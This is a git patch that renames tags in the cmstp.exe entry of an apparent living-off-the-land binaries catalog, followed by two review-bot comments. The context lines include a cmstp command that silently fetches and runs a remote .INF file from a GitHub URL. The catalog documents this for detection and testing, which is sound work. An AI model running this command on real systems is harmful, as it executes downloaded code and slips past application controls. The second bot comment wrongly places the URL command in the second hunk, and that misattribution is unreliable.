From 654685344666dfa8461d9b5ac4b40639961c22df Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 12:16:28 +0200 Subject: [PATCH] Update Cmstp.yml Tags: Changed Input: INF to Execute INF for consistency Inout: Customformat added --- yml/OSBinaries/Cmstp.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index 903ec73..3a91d24 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -12,7 +12,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - - Input: INF + - Execute: INF + - Input: Custom Format - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Usecase: Execute code hidden within an inf file. Execute code directly from Internet. @@ -21,7 +22,8 @@ Commands: MitreID: T1218.003 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - - Input: INF + - Execute: INF + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe
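Review bot: In the first hunk (@@ -12,7 +12,8 @@), replacing `- Input: INF` with `- Execute: INF` changes the tag key, not only its value, so anything that filters entries on the `Input` key (site filters, coverage scripts that consume the YAML) will now see `Custom Format` for this entry instead of `INF`. The commit message gives consistency as the reason but writes the new value as "Customformat", while the hunk adds `Custom Format`. Please confirm that the spelling with the space matches the other entries, and state in the PR description which tag convention this aligns with so consumers of the old key know to update their queries.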
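Review bot: In the second hunk (@@ -21,7 +22,8 @@), the two new tags are identical to the ones added in the first hunk, although this entry is the one whose command passes an https URL to `cmstp.exe /ni /s` and whose Usecase reads "Execute code directly from Internet", so nothing in the tags distinguishes the remote-fetch variant for someone filtering by tag. If the tag vocabulary has a value for remotely sourced input, add it here; if not, the distinction stays only in the Description, which is worth saying in the PR. While touching this entry, also confirm that its OperatingSystem line is meant to stop at Windows 10, since the entry in the first hunk lists Windows 11.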